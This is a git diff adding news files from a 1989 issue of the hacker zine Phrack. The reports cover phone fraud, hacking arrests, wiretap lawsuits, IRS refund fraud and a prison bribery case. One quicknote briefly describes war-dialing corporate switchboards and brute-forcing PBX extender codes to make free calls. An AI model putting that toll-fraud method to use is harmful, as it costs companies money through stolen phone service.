+the Warden's password which I just happen to have and will give
+to you in exchange for your cooperation.
+
+$70,000 was hard to resist.  But Glass was a prudent man, and he
+asked what guarantee would he have of payment once Armand Moore
+was released.  After all, hadn't he promised those fellows at the
+bank all sorts of things and then tried to skip town immediately
+when he thought the transfer had gone through?  He would even
+cheat his fellow crooks, wouldn't he?
+
+Moore offered a $20,000 "down payment" to show his intentions.  A
+confederate outside the prison would meet Glass' wife and give
+her the money.  Then the job would be done, and following Moore's
+untimely release from the joint, the rest would be paid.  The
+deal was made, alleges the government, and Armand Moore used a
+pay phone at the prison that day to call his stepsister and have
+her arrange to meet Mrs. Glass.  The money would be exchanged;
+Glass was off two days later and would make the necessary
+"adjustments" from his home computer; the prison roll would
+reflect this on the next morning's roster of prisoners with the
+notation "Time Served/Release Today."  They would meet that
+evening and exchange the rest of the money.
+
+All telephones at the prison, including the public pay phones,
+are subject to monitoring.  A sign on each pay phone advises that
+"your call may be monitored by an employee authorized to do so."
+The FBI alleges that recordings were made of Moore on the phone
+telling his stepsister that she should "...work with Randy, a
+person affiliated with the law..." and that she would meet Mrs.
+Glass the next day.  With a court ordered tap obtained a few
+minutes later, the FBI heard Stephanie Glass agree to meet
+Moore's stepsister at 5:45 AM the next morning in a parking lot
+in Richton Park, IL.
+
+At the appointed time the next morning, the two cars met in the
+parking lot, and the FBI alleges the one woman handed the other a
+package containing $20,000 in cash.  The FBI videotaped the
+meeting and waited until Mrs. Glass had driven away.  They
+followed her home, and arrested her at that time.  Randy Glass
+was arrested at the prison when he arrived for work about an hour
+later.  Armand Moore was arrested in his cell at the prison once
+Glass had been taken into custody.  To do it the other way around
+might have caused Glass to get tipped off and run away.
+
+On Thursday, September 21, 1989 Mr. & Mrs. Glass and Armand Moore
+appeared before United States Magistrate Joan Lefkow for
+arraignment and finding of probable cause.  Finding probable
+cause, she ordered all three held without bail at the prison
+until their trial.  Randy Glass is now, so to speak, on the wrong
+side of the bars at the place where he used to work.  He was
+suspended without pay at the time of his arrest.
+
+At the hearing, Magistrate Lefkow directed some particularly acid
+comments to Mr. Moore, noting that he was forbidden to ever use
+the telephone again for any reason for the duration of his
+confinement, and was forbidden to ever be in the vicinity of the
+computer room for any reason, also for the duration.
+
+She noted, "...it seems to me you continue to seek the
+conspiracy's objectives by using the telephone, and convincing
+others to manipulate the computer..." you stand here today and
+show no remorse whatsoever except that you were caught once
+again.  Your prison record notes that on two occasions, prison
+staff have observed you using the telephone and "...pressing the
+touchtone buttons in a peculiar way during the call..." and that
+you were counseled to stop doing it.  I will tell you now sir
+that you are not to use the telephone for any reason for the
+remainder of your current sentence.  I find probable cause to
+hold you over for trial on the charge of bribery of a government
+employee.  Stay away from the phones and computers at the prison
+Mr. Moore!"
+
+Like Gabriel Taylor at the First National Bank, neither Randy
+Glass or his wife had any prior arrest record or conviction.  In
+a foolish moment of greed, spurred on by a friendly fellow who
+Randy really enjoyed talking to "...because he was so smart and
+well-educated..." they now get to face prison and the loss of
+everything in their lives.  When all three were leaving the
+courtroom Thursday, Armand Moore snickered and smiled at the
+audience.  He'll find other suckers soon enough.
+______________________________________________________________________
diff --git a/phrack28/11.txt b/phrack28/11.txt
new file mode 100644
index 0000000..c5447df
--- /dev/null
+++ b/phrack28/11.txt
@@ -0,0 +1,507 @@
+                                ==Phrack Inc.==
+
+                    Volume Three, Issue 28, File #11 of 12
+
+            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+            PWN                                                 PWN
+            PWN        P h r a c k   W o r l d   N e w s        PWN
+            PWN        ~~~~~~~~~~~   ~~~~~~~~~   ~~~~~~~        PWN
+            PWN               Issue XXVIII/Part 3               PWN
+            PWN                                                 PWN
+            PWN                 October 7, 1989                 PWN
+            PWN                                                 PWN
+            PWN          Created, Written, and Edited           PWN
+            PWN               by Knight Lightning               PWN
+            PWN                                                 PWN
+            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+
+FCC Orders Radio Station To Stop Phone Pranks                   August 30, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+The Federal Communications Commission has slapped Chicago radio
+station WLUP-AM (1000) and WLUP-FM (97.9) with a $5000 fine and
+threatened to pull their license for illegally broadcasting phone
+calls to "unsuspecting individuals."
+
+The FCC specifically cited "willful behavior and repeated
+violations of its policy that recipients of phone calls from
+radio stations must be informed in advance -- and on the air at
+the start of the call -- that they are being broadcast."
+
+In particular, the FCC noted that morning host Jonathon
+Brandmeier and mid-day host Kevin Matthews were in frequent
+violation of this rule.
+
+Scott G. Ginsberg, president and chief executive officer of
+Evergreen Media Corporation, parent company and license holder
+for WLUP confirmed that his company had paid the $5000 fine
+without protest for illegally broadcasting phone calls.  He
+compared this punishment to receiving a traffic ticket.
+
+Both Brandmeier and Matthews enjoy harassing people on the phone,
+and broadcasting the reaction of their victims over the air.  One
+of the calls placed by Matthews involved him posing as a police
+officer.  He called a funeral home and spoke to the widow of a
+man who died the day before.  He told her that her niece and
+nephew, who were scheduled to come to the funeral home later that
+day to help with burial arrangements had been arrested.  The
+widow was not amused.  She filed suit against WLUP and Matthews.
+
+Brandmeier likes to harass celebrities by managing to find their
+unlisted home phone numbers and call them at 6:30 or 7:00 AM when
+his show goes on the air.  He also pulls phone scams including
+sending unwanted food orders; calling employers to provide
+excuses for employees who won't be at work that day, and similar.
+Always broadcasting the calls on the air, of course.
+
+But it was the call to the grieving widow at the funeral home
+which got the FCC livid.  The Commission contacted the station
+that day, and an Enforcement Officer threatened to put the
+station off the air that day -- in a matter of minutes when he
+could get the order signed.
+
+After some discussion, WLUP was permitted to continue
+broadcasting, but a memo was circulated to all employees warning
+that effective immediately, any violation of the phone rules
+would lead to immediate termination.
+
+But despite this, less than three months later, Brandmeier pulled
+another of his obnoxious phone pranks.  This time, the FCC gave
+him personally a $5000 fine, and told WLUP "either keep those two
+under control on the air or you'll get your license yanked."
+
+Now WLUP faces more sanctions, and the probable non-renewal of
+its license when it expires December 1, 1989.  Afternoon disk
+jockey Steve Dahl routinely broadcasts indecent material on his
+show.  Daily topics of conversation include sadism and masochism,
+child molestation, sexual behavior of all sorts, and frequent
+slurs of the most vicious kind against gay people.  He uses
+"street language" to express himself, of course, and has used the
+famous "seven words you never say on the radio" more times than
+anyone remembers.
+
+The victims of the phone pranks have consulted with their own
+attorney as a group, and he in turn is pressing the FCC to shut
+down WLUP completely.
+
+Ginsberg says he does not understand why the FCC is picking on
+them.  He says it must be competing radio stations that would
+like to see them off the air, since they are rated number three
+in the Chicago area, which certainly says a lot about Chicagoan's
+taste in radio entertainment.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+- - - - - - -
+
+Long time Phrack World News readers may have noticed a familiar name in this
+article:  Steve Dahl.
+
+Depending on how long you have been with us, you may wish to
+refer to Phrack World News Issue Five/Part One (in Phrack Inc.
+Volume One, Issue Six).  There is an article entitled "Mark Tabas
+and Karl Marx Busted" and it is dated May 2, 1986.  Along with
+this article is a short note that explains how an informant
+(possibly the son of an agent of the Secret Service or Federal
+Bureau of Investigation) was believed to be using the handle of
+Jack or Will Bell and had helped the authorities get Tabas and
+Marx.  It was widely known that he was from the 312 NPA --
+Chicago, Illinois.
+
+In the following issue of Phrack Inc. we have PWN Issue VI/Part 1
+and an article entitled, "Marx and Tabas:  The Full Story."  This
+article further explains how Steve Dahl was busted (for unknown
+crimes) in Miami, Florida by the U.S. Secret Service and then
+made a deal to help them get Karl Marx and Mark Tabas.
+
+So is the Steve Dahl of WLUP in Chicago the same Steve Dahl from
+Chicago that helped the U.S. Secret Service nail Mark Tabas and
+Karl Marx?
+_______________________________________________________________________________
+
+Reach Out And Tap Someone Revisited                               July 30, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+In Phrack World News Issue XXVI/Part 2 there was an article about
+two former employees of Cincinnati Bell (Leonard Gates and Robert
+Draise) who claimed they had had engaged in numerous illegal taps
+over a 12 year period at the request of their supervisors at
+Cincinnati Bell and the Cincinnati Police Department.
+
+Cincinnati Bell filed suit against the two men, Leonard Gates and
+Robert
+Draise, claiming both were liars out to get even with the company
+after they had been fired for other reasons.
+
+"'Taint necessarily so," said a judge who agreed the charges may
+have some merit, and permitted the class action suit against
+Cincinnati Bell to continue this past week.
+
+The class action suit claims that Cincinnati Bell routinely
+invaded the privacy of thousands of people in the area by
+secretly tapping their phones at the request of police or FBI
+officials over a twelve year period from 1972 - 1984.  The taps
+were mainly applied against political dissidents during the
+Vietnam era, and in more recent years, against persons under
+investigation by the United States Attorney in southern Ohio,
+without the permission of a court.
+
+Now says the court, depending on the outcome of the class action
+suit, the criminal trials of everyone in the past decade in
+southern Ohio may have to be re-examined in light of illegal
+evidence gained by the United States Attorney, via the FBI, as a
+result of the complicity of Cincinnati Bell with that agency,
+courtesy of Robert Draise and Leonard Gates.
+
+The testimony this past week got *very messy* at times.  Gates
+and Draise seem determined to tell every dirty thing they know
+about Cincinnati Bell's security department from the dozen years
+they worked there.  More details as the trial continues.
+_______________________________________________________________________________
+
+The Grim Phreaker Cleared In Phone Scam                           June 30, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by Suzanne Getman (Syracuse Herald Journal)
+
+            "We disposed of this on the basis of his
+cooperation."
+
+A college student who talked his way into being arrested in April
+(by speaking with a chat operator) was cleared of charges against
+him this week.  Kevin C.  Ashford aka The Grim Phreaker, age 22,
+was arrested by sheriff's deputies on April 21 a mere five
+minutes after using a payphone to speak with an operator on the
+Onadaga Community College campus and charged with theft of
+services, a misdemeanor.
+
+Ashford admitted placing about 30 calls to a party lines known as
+bridges by using phony credit card numbers and extenders.  "We
+disposed of this on the basis of his cooperation, our problem
+with proof, and his completion of 30 hours of community service,"
+Assistant District Attorney Timothy Keough said.  Ashford had
+cooperated by assisting and providing information to the
+Sheriff's Department, the Federal Bureau of Investigation, and
+the Secret Service for more than three weeks.  There was no
+problem with proof however because Ashford admitted he was guilty
+of all of the crimes.
+
+Ashford was arrested in Onadaga Community College campus' Gordon
+Student Center on April 21, minutes after he placed a call to a
+nationwide party line called Systems 800 International (who
+offered to drop charges if they could receive copies of Phrack
+Inc. Newsletter from him and if he would work for them trapping
+others).  Company officials said there is no way to establish the
+cost of the fraudulent calls.  "Without a dollar amount, we
+didn't have proof.  Without proof, we couldn't prosecute," Keough
+said.
+
+                         Article Submitted by DarkMage
+_______________________________________________________________________________
+
+Phony IRS Refunds By Computer                                   August 17, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+By John King (Boston Globe)
+
+        "Computer Filer Got $325,000 In Phony Refunds, IRS
+claims."
+
+Clever tax preparers are one thing, but a clever bookkeeper who
+allegedly pried 325,000 dollars from the Internal Revenue Service
+found himself on the wrong side of the law yesterday, August 16.
+
+In what may be the nation's first charge of electronic tax fraud,
+IRS special agents yesterday arrested Alan N. Scott of West
+Roxbury [a suburb of Boston], saying he claimed 45 fraudulent
+income tax refunds for amounts ranging from
+3,000 dollars to 23,000 dollars.
+
+The IRS charges that Scott, age 37, used the service's new
+electronic filing system -- open only to tax preparers -- to
+submit phony claims with assumed names and Social Security
+numbers.  In some cases, the names used were of people in prison,
+according to Chief Kenneth Claunch, IRS Criminal Investigation
+Division.
+
+"The computer age has spawned a new breed of criminal," Claunch
+said in a statement.
+
+New in tools, perhaps.  As for the basic idea -- filing a false
+return in order to snare an unwarranted refund -- that's old hat,
+admitted IRS spokeswoman Marti Melecio.
+
+"I can't say that it's a new trick.  We've had fraud cases with
+paper returns," Melecio said.  "The time frame is different,
+though.  With electronic filings, the returns come back in two or
+three weeks."
+
+According to the IRS, Scott received electronic filing status on
+January 31.  He did this by using a false Social Security number,
+and making false statements on his application.  However, the IRS
+also says Scott electronically filed 10 returns where he used his
+own name as a preparer, and these returns appear to be
+legitimate.
+
+The scheme was uncovered by a "questionable refund detection
+team," at the IRS service center in Andover, Massachusetts.
+Also, the IRS credited a tip from an unnamed Boston bank "which
+reported a suspicious electronic transfer of funds to an
+individual," presumably Scott.
+
+If convicted, Scott faces a possible prison sentence and up to
+250,000 dollars in fines on each of the counts of fraud.
+_______________________________________________________________________________
+
+Paris Computer Takes Law Into Its Own Hands                   September 6, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+>From The Guardian
+
+A crusading computer has taken the law into its own hands and
+caught 41,000 Parisians on charges of murder, extortion,
+prostitution, drug trafficking and other serious crimes.  But the
+big round-up ended in embarrassment after an admission by the
+City Hall yesterday that the electronic "Batman" could not
+tell the difference between a parking offense and gang warfare.
+"The accused persons will be receiving letters of apology," an
+official at the City Hall Treasury department said. "Instead of
+receiving summons on criminal charges, they should have been sent
+reminders of unpaid motoring fines in April.  Somehow the
+standard codes we use for automatically issued reminders got
+mixed up."
+
+The first hint of the avenging computer's self-appointed mission
+to clean up the capital came at the weekend.  Hundreds of
+Parisians received printed letters accusing them of big crimes,
+but demanding only petty fines for the major crimes of between
+$50 and $150 (pounds - UK equivalent).  "About 41,000 people are
+involved and some of the charges are quite weird," the official
+admitted.  "One man has complained of being accused of dealing in
+illegal veterinary products.  Unfortunately, other accusations
+went much further, like man-slaughter through the administration
+of dangerous drugs."  "There were a lot of cases of living off
+immoral earnings, racketeering and murder."  The official said an
+inquiry had been started to see if the caped computer had a human
+accomplice.  So far, no one has asked the Joker if he was in
+Paris last week.
+_______________________________________________________________________________
+
+Chalisti Magazine by the Chaos Computer Club
+August 20, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+In the future, there will be an electronic magazine, published
+by, and concerning the Chaos Computer Club.  It is called
+Chalisti and the name is derived from "Kalisti," the Goddess of
+Chaos and will, hopefully, stand for creative Chaos and not for
+chaotic, but, as always only time will tell.
+
+The idea is like this...
+
+Over the different data networks, masses of information flow.  On
+the Usenet it is about 100 MB/Month, on the CREN (Bitnet + CSNet)
+the flow is about the same size.  On top of these flows, there is
+the information from national networks like Zerberus, BTX and
+Geonet.  Mostly, a person only gets information from one network
+and that is why interesting information on data protection, data
+security, alternative uses of computers, environment, university
+etc. are being broadcast over only one network.
+
+Information from the networks for the networks, but that is not
+all.  There should emerge a list of editors, that is spread over
+a large area, and works over the nets.  Information and and
+opinions should be exchanged, but also further contacts will
+emerge.
+
+The first edition of Chalisti will presumably be published
+mid-September.  Because of this, the list of editors is
+relatively small, one will publish stuff from the newest
+"Datenschleuder", the MIK-magazine and the most interesting
+messages from the nets that appear in the following weeks.  But
+as soon as the 2nd edition will appear, the content will be
+different from the "Datenschleuder."
+
+In Chalisti, copy and messages from the nets and other media
+(MIK, and others) will be published as well.  Articles meant
+especially for the Chalisti magazine are requested and these
+articles will be published with the highest priority.
+
+The magazine will be no bigger than 100 KB/Month.  In case of
+doubt, articles will be kept for the forthcoming edition or for
+the fall in copy in the Summer.  But it is also possible, that
+too few articles are being sent in, in which case the content
+will be spiced with information from DS, the nets and the
+MIK-magazine.  In this way, a regular emerging of editions is
+being secured.
+
+The first edition is due 15th of September.  The second at the
+end of October.  At that date, the holiday will be ended, and a
+editorial and informal infrastructure will be built.  From then
+on, there should be an edition every month.
+
+The editorial part will presumably be done on EARN or CREN.  That
+bears the advantage that quick reactions on recent messages will
+be possible, as well as the possibility to talk it over at
+Relay's or Galaxy Meetings, and in this way, an international
+medium is available.  Writers of articles or editors from other
+nets can be contacted, and there shouldn't be no technical
+problems in getting the job done.  Especially on UUCP and
+Zerberus, facilities will be created.
+
+As ways of contacting the Editors, the following Networks are
+available:
+
+         EARN/CREN   - Distribution will be done over CHAMAS (107633@DOLUNI1).
+                       There will be a board for Chalisti, as well as a CUG
+                       for the board of Editors.  Contact there will be
+                       151133@DOLUNI1.  Presumably, from the beginning of
+                       October, the userid CHAMAINT@DOLUNI1 will be available.
+
+         UUCP/Subnet - Contacting will be possible through chalist@olis,
+                       ccc@mcshh and through ..!tmpmbx!DOLUNI1.bitnet!151133.
+
+         UUCP/Dnet   - Contacting will be possible through simon@uniol.
+                       Distribution will proceed through this id in
+                       dnet.general.
+
+         Zerberus    - At this moment: terra@mafia and terra@chaos-hh. From
+                       mid-September on, presumably through chalist@subetha.
+
+         BTXNet      - Unknown yet.
+
+         GeoNet      - mbk1:chaos-team. Time will show, whether distribution
+                       of the magazine will be done on GeoNet.
+
+Contacting or distribution through FidoNet and MagicNet has been planned for,
+but has to be built first.
+
+Interested people are being asked to use these addresses.  For the absolute
+uncontactable, there is a Snailmail address as well:
+
+Frank Simon
+12 Kennedy Street
+2900 Oldenburg, FRG (West Germany)
+
+04411/592607 (Telephone)
+
+Greets
+
+     Terra
+_______________________________________________________________________________
+
+Computer-Based Airline Ticket Scam                              August 14, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Taken from the Los Angeles Times
+
+Phoenix police arrested four people as they continued to unravel
+a bogus airline ticket ring that allegedly sold millions of
+dollars of stolen tickets by advertising discounted fares in
+national publications.  Investigators said the individuals put
+together a major conspiracy by knowing how to access airline
+computers to put travel itineraries in the computer system.  - -
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+- - - - -
+In the interests of equal access to information for all, I have
+decided to include some of the supposed deep secrets of how to
+access airline computers and inset travel itineraries.
+
+This can be done from virtually any telephone nationwide
+(including a rotary dial telephone).  This can of course also be
+done from a public payphone if you should decide to make sure
+your identity is anonymous.
+
+It is necessary to determine the phone number for an airline's
+computer.  All you have to do is call 1-800 directory assistance
+(1-800-555-1212).  Ask for Ozark Airlines reservations (a no
+longer existent company that was purchased by Trans World Airways
+[TWA] used here only as an example).  The operators on duty will
+read you a number, 800-PRE-SUFF.
+
+Call this number and you will be connected with the Ozark
+Airlines reservation office.  Here they will have a database
+which stores all of Ozark's itineraries.  Simply state the date,
+flight number, departure and destination cities, and passenger
+name.  It's that easy!  You can later dial the same access number
+and cancel or modify your itineraries.  The system even includes
+search functions if you don't know the flight number, and an
+extensive help system (just say "How do I make a reservation?").
+_______________________________________________________________________________
+
+Fighting Back Against Junk Calls                              September 4, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "We are not Pavlov's dogs and
+should not have to jump everytime a bell rings."
+
+And if we do hop to the phone on demand, we ought to be paid for
+it, says Bulmash, president of Private Citizen, Inc., a
+Warrenville, IL organization designed to prevent what Bulmash
+describes as "junk calls" from telemarketers.
+
+We deserve at least a C-note -- $100, he says.
+
+Twice a year, Bulmash, age 43, a paralegal by trade, mails a
+directory of people who don't wish to have telephone solicitors
+call them to 600 telemarketing firms.  Along with the
+directories, he sends a contract which states that the people
+listed will listen to the solicitors only in exchange for $100.
+
+If the solicitors call, the contract says, the telemarketing
+company owes the listener $100.  It's for "use of private
+property -- the phone, your ear, your time," says Bulmash.
+
+Subscribers, now numbering about 1000, pay $15 per year to be
+listed in the
+Private Citizen directory.
+
+While Bulmash doesn't guarantee you won't be called, he does
+offer some success stories.  He says subscribers have collected
+anywhere from $5 - $92 from telemarketing companies.  He offers a
+money-back deal for those subscribers not completely satisfied.
+He says only one person has taken him up on it.
+
+"You can tell those companies 500 times over the phone not to
+call and they won't listen," Bulmash says.  "But when you
+threaten them with charging them for your time, that gets their
+attention."
+
+Bulmash, who began Private Citizen in May, 1988, says
+telemarketers have the attitude of "we're big business, so you
+just hang up the phone if you don't like us.  I say we have a
+right to be left alone in the first place, at least in our
+homes."  Typically, a telemarketing call to a home has less than
+a 3 percent success rate, he said, with the other 97 percent of
+us -- and we know who we are -- being unnecessarily
+inconvenienced.
+
+Bulmash says he has testified before Illinois and California
+state legislative committees and has lobbied state and federal
+lawmakers for relief from telemarketers.  He teaches the members
+of his organization how to bill for their time, and in many
+cases, make the charges stick and get payment for "the use of
+their time, ear and phone."
+
+For more information on Private Citizen, contact Bulmash at
+312-393-1555.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Banned in Boston -- Telemarketer Gets Sued!                  September 14, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Alan Schlesinger's stock in trade is suing people.  But you might
+say his stock is too hot to handle at Merrill Lynch these days.
+A Boston lawyer who hates telephone solicitors, Schlesinger sued
+Merrill Lynch after the brokerage firm ignored "repeated
+requests" to quit calling him with investment proposals.
+
+To Merrill Lynch's surprise, he won an injunction.  Indeed, he
+sued them twice and won both times.  The second time was after an
+unwitting broker called him in violation of the court order
+prohibiting it.
+
+"This is something that bothers a lot of people, but they don't
+have the sense they can do something about it," said Schlesinger,
+whose best retort is a tort, it would seem.  In the second suit,
+the court awarded him $300, for the costs of his prosecution of
+the matter and for his time spent on the phone with the brokerage
+house's phone room.
+
+"He is using an atom bomb to deal with a gnat," said William
+Fitzpatrick, chief lawyer for the Securities Industry
+Association, faulting Schlesinger for doing what comes naturally
+for an attorney:  "Being a lawyer myself, I can only guess he
+doesn't have enough brains to just hang up the phone."
+______________________________________________________________________
diff --git a/phrack28/12.txt b/phrack28/12.txt
new file mode 100644
index 0000000..ad81640
--- /dev/null
+++ b/phrack28/12.txt
@@ -0,0 +1,472 @@
+                                ==Phrack Inc.==
+
+                    Volume Three, Issue 28, File #12 of 12
+
+            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+            PWN                                                 PWN
+            PWN        P h r a c k   W o r l d   N e w s        PWN
+            PWN        ~~~~~~~~~~~   ~~~~~~~~~   ~~~~~~~        PWN
+            PWN               Issue XXVIII/Part 4               PWN
+            PWN                                                 PWN
+            PWN                 October 7, 1989                 PWN
+            PWN                                                 PWN
+            PWN          Created, Written, and Edited           PWN
+            PWN               by Knight Lightning               PWN
+            PWN                                                 PWN
+            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+
+Woman Indicted As Computer Hacker Mastermind                      June 21, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by John Camper (Chicago Tribune)
+
+A federal grand jury indicated a Chicago woman Tuesday for
+allegedly masterminding a nationwide ring of computer hackers
+that stole more than $1.6 million of telephone and computer
+service from various companies.
+
+The indictment charges that Leslie Lynne Doucette, 35, of 6748
+North Ashland Ave, and 152 associates shared hundreds of stolen
+credit card numbers by breaking into corporate "voicemail"
+systems and turning them into computer bulletin boards.
+
+Voicemail is a computerized telephone answering machine.  After a
+caller dials the machine's number he punches more numbers on his
+telephone to place messages in particular voicemail boxes or
+retrieve messages already there.
+
+The indictment charges that the hacker ring obtained more than
+$9,531.65 of merchandise and $1,453 in Western Union money orders
+by charging them to stolen bank credit card numbers.
+
+It says the group used stolen computer passwords to obtain
+$38,200 of voicemail service and stolen telephone credit card
+numbers to run up more than $286,362 of telephone service.
+
+But the biggest haul, more than $1,291,362, according to the
+indictment, represented telephone service that was stolen through
+the use of Private Branch eXchange (PBX) "extender codes."
+
+A PBX system provides internal telephone service within a
+company.  If a PBX system is equipped with an extender, a person
+can call the PBX system, punch in a code, and dial long distance
+at the expense of the company that owns the
+system.
+
+The only corporate victims of the alleged fraud named in the
+indictment are August Financial Corporation of Long Beach
+California, and A-1 Beeper Service of Mobile, Alabama.
+
+Doucette has been held without bond in the Metropolitan
+Correctional Center since May 24, when she was arrested on a raid
+on her apartment that netted 168 telephone credit card numbers
+and 39 extender codes, federal authorities said.  The indictment
+does not name any members of the alleged ring, but authorities
+said the investigation is continuing.
+
+United States Attorney Anton R. Valukas said the indictment is
+the nation's first involving abuse of voicemail.
+
+"The proliferation of computer assisted telecommunications and
+the increasing reliance on this equipment by American and
+international business create a potential for serious harm," he
+said.
+
+Authorities said they discovered the scheme last December after a
+Rolling Meadows real estate broker reported that hackers had
+invaded his company's voicemail system and changed passwords.
+
+Authorities said they traced the calls into the Rolling Meadows
+voicemail system to telephones in private homes in Chicago,
+Columbus, Ohio, and suburban Detroit, Atlanta and Boston.
+
+Checks on those phones led them to voicemail systems in companies
+around the country, they said.
+
+[For more information see Phrack World News XXVII/Part One and
+the article entitled, "Computer Intrusion Network in Detroit,"
+dated as May 25, 1989 --KL]
+_______________________________________________________________________________
+
+Phreaks Abuse East St. Louis Phone Card
+September 24, 1989 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ East
+St. Louis, IL, a dirt-poor minority suburb of the larger Missouri
+city by the same name was victimized for several months by
+phreaks without realizing it until the phone bills for a one year
+period were audited recently.
+
+According to a recent story in the Belleville, IL
+(News-Democrat), the city is being billed for phone calls to
+dial-a-porn services and from points as far flung as Florida and
+Texas.
+
+The monthly phone bill for the city of East St. Louis averages
+$5000, and over the past year it has included calls to nearly
+every state as well as to "900" area adult talk lines.  City
+Treasurer Charlotte Moore said the number of questionable calls
+in each month's phone bill, which is usually two inches thick,
+shows the "need for better policing of phones."
+
+No kidding!  The (News-Democrat) obtained copies of the phone
+bill for several months under the Freedom of Information Act, and
+set about reviewing the places and people called.  For example,
+from March through May of this year, hundreds of dollars in calls
+were made from places in Texas, Florida and elsewhere, and
+charged to a Calling Card number assigned to the city.
+
+In one instance, a caller in northern Florida made a 288-minute
+call to Miami that cost East St. Louis $39.27.  The
+(News-Democrat) called the Miami number, and reached a man named
+John, who refused to give his last name, and claimed he "...had
+never even heard of East St. Louis..."
+
+Calls from one certain number in Houston to places all over the
+United States accounted for more than $1000 in charges over
+several months.  A man who answered the phone at the Houston
+number refused to give his name and refused to discuss the
+matter, or explain how his phone might have been used for the
+fraudulent calls.
+
+Prior to intervention by the newspaper, the city had done
+nothing.  Apparently they were not even aware of the abuse.  On
+notification, the local telco cancelled all outstanding PINS, and
+issued new ones.  Meanwhile, the city of East St. Louis continues
+to plead poverty.  They are barely able to meet payroll for city
+employees, and have skipped a couple of paydays at that.  The
+city has an extremely poor tax base, and will likely file
+bankruptcy in the near future.
+_______________________________________________________________________________
+
+The Cuckoo's Egg
+October 1, 1989 ~~~~~~~~~~~~~~~~
+    The Cuckoo's Egg: Tracking a Spy Through the Maze of Computer
+         Espionage by Cliff Stoll, Doubleday, 1989, ISBN
+         0-385-24946-2 ($19.95)
+
+          Book Review by Louise Bernikow, Cosmopolitan, October
+1989
+
+Here is a first -- the true story of a man who notices a
+seventy-five cent discrepancy in a computer's accounting system
+and runs the error down until it leads to a real live spy ring.
+Even if you don't know a byte from a bagel, this book will grip
+you on page one and hold you as ferociously as the best mystery
+stories.
+
+It is astrophysicist-turned-systems-manager Cliff Stoll's first
+week on the job at a lab in Berkeley, California.  The error
+turns up, and he tries to figure out why, partly as an exercise
+in learning about the computer system he's going to be working
+with.  Almost immediately, he discovers that somebody had been
+breaking into the computer network using a fake password.  That
+discovery leads him to other break-ins in other computers,
+including some in military installations.  He alerts the FBI,
+which, since he has lost neither half a million dollars nor any
+classified information, says, "Go away, kid."
+
+Stoll presses on, sleeping under his desk at night, monitoring
+the system -- a hound waiting for the fox to come out in the
+open.  There is suspense aplenty, but it's the intensely human,
+often funny voice of the man on the trail that makes this book so
+wonderful.  Stoll's girlfriend, Martha, a law student, seems like
+one smart and delightful cookie, and she puts up with his
+obsession pretty well.  In the end, Stoll becomes a national
+hero.  The play-by-play is nothing short of fascinating.
+
+                  [I wonder if anyone got those cookies --KL]
+_______________________________________________________________________________
+
+Hackwatch Spokesman Charged
+October 2, 1989 ~~~~~~~~~~~~~~~~~~~~~~~~~~~ Taken from Computing
+Australia
+
+Self-styled computer security expert Paul Dummett, alias Stuart
+Gill, has been charged with making false reports to the Victoria
+Police following an investigation into claims he made in the
+daily media late in 1988 and early this year.  The articles often
+quoted Gill, introducing himself as a spokesman for either
+"Hackwatch" or the "DPG monitoring service".
+
+Gill claimed hackers in Australia had gained access codes from
+others in the US and lifted $500,000 (US) from the International
+Citibank, United States.  Other claims include credit card
+numbers had been posted on bulletin boards for BBS users' access;
+drugs, including steroids, were being sold using bulletin boards;
+evidence of this had been given to the police by informers; and
+in response, the police had raided several hackers' homes.  The
+police, including the Criminal Investigation Bureau and the Fraud
+Squad's Computer Section, repeatedly denied the claims.
+
+Gill had disappeared, but returned again on September 22 and was
+charged in the Frankston Magistrates' Court under his real name,
+Paul Dummett.  According to court documents, police investigating
+Dummett's claims allegedly found Citibank's computer network had
+not been illegally accessed on its New York number as Dummett had
+claimed.  When Dummett appeared in court his legal aid counsel
+Serge Sztrajt applied successfully to adjourn the case until
+October 20.  Dummett did not enter a plea.
+_______________________________________________________________________________
+
+                                PWN Quicknotes ~~~~~~~~~~~~~~ 1.
+                                Hire A Hacker? -- "Some very
+                                notable people in the computer
+    industry started out as hackers tinkering around in a
+    mischievous fashion," Ron Gruner, president of Alliant
+    Computer Systems Corporation told Computerworld why he would
+    probably hire Robert T. Morris Jr., of Cornell and creator of
+    Internet worm.  - - - - - - - - - - - - - - - - - - - - - - -
+    - - - - - - - - - - - - - - - - - 2.  Computer Hackers Rip
+    Off Corporate 800 Lines -- Computer hackers pride themselves
+    on never having to pay for long distance calls.  How do they
+    do it?  Sam Daskam, president of Information Security
+    Association (ISA), explains:  Hackers call corporate numbers
+    until they find one with an automated switchboard.  The
+    fingers do not do the walking.  Automatic caller software is
+    used.  Then they link their computer to try all combinations
+    of three or four-digit numbers until they find one which
+    connects them to the company's outside toll or 800 line.
+    Once they get a dial tone, they can make calls anywhere at
+    the firm's expense.  Taken from the Security Letter 1989.  -
+    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+    - - - - - - - - 3.  900 Service Considered -- There has been
+    talk among some companies about switching from using the 800
+    toll free numbers to 900 numbers since the ease of use of the
+    900 numbers has been shown so vividly.  This would save the
+    corporations a large degree of money.  - - - - - - - - - - -
